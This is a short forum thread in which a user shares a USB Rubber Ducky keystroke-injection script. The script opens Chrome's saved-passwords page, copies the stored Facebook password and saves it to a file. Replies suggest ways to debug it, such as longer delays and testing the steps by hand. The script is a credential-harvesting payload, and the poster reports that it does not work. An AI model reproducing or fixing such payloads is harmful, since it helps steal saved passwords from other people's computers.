RubberMic Posted June 13, 2015 Share Posted June 13, 2015 just got my ducky and tried to take the password of my Facebook account using chrome saved passwords. (I'm running on win 8.1 just to clarify) but this script that i tried to write doesn't seem to work. can anyone see why this seems to not work???? this is the script: DELAY 500 GUI D DELAY 500 GUI R DELAY 500 STRING chrome DELAY 500 ENTER STRING chrome://settings/passwords DELAY 500 ENTER STRING facebook DELAY 500 TAB DOWNARROW TAB ENTER TAB TAB TAB TAB TAB TAB CTRL C DELAY 500 GUI R DELAY 100 STRING notepad.exe CTRL V DELAY 100 ALT f DELAY 100 STRING s TAB TAB TAB TAB TAB TAB ENTER STRING C:\Users\Zem The Mattress\Music\ ENTER TAB TAB TAB TAB TAB TAB STRING hello ENTER Quote Link to comment Share on other sites More sharing options...
Oli Posted June 13, 2015 Share Posted June 13, 2015 Well it is written in Ducky script so looks like ****, that's your first problem :) But really, enter the commands on a keyboard and see where the problem occurs? If everything works OK it is possibly a delay related issue. Quote Link to comment Share on other sites More sharing options...
MB60893 Posted July 1, 2015 Share Posted July 1, 2015 I agree with Oli. Also, try to increase the delays on the rubber ducky. It can sometimes be difficult for Windows to keep up with the speed of the keyboard. Quote Link to comment Share on other sites More sharing options...
shamwow Posted July 6, 2015 Share Posted July 6, 2015 (edited) that is not how to get chrome passwords. you should test your commands in command prompt or make a batch file before attempting to make a ducky script out of them. Edited July 6, 2015 by shamwow Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.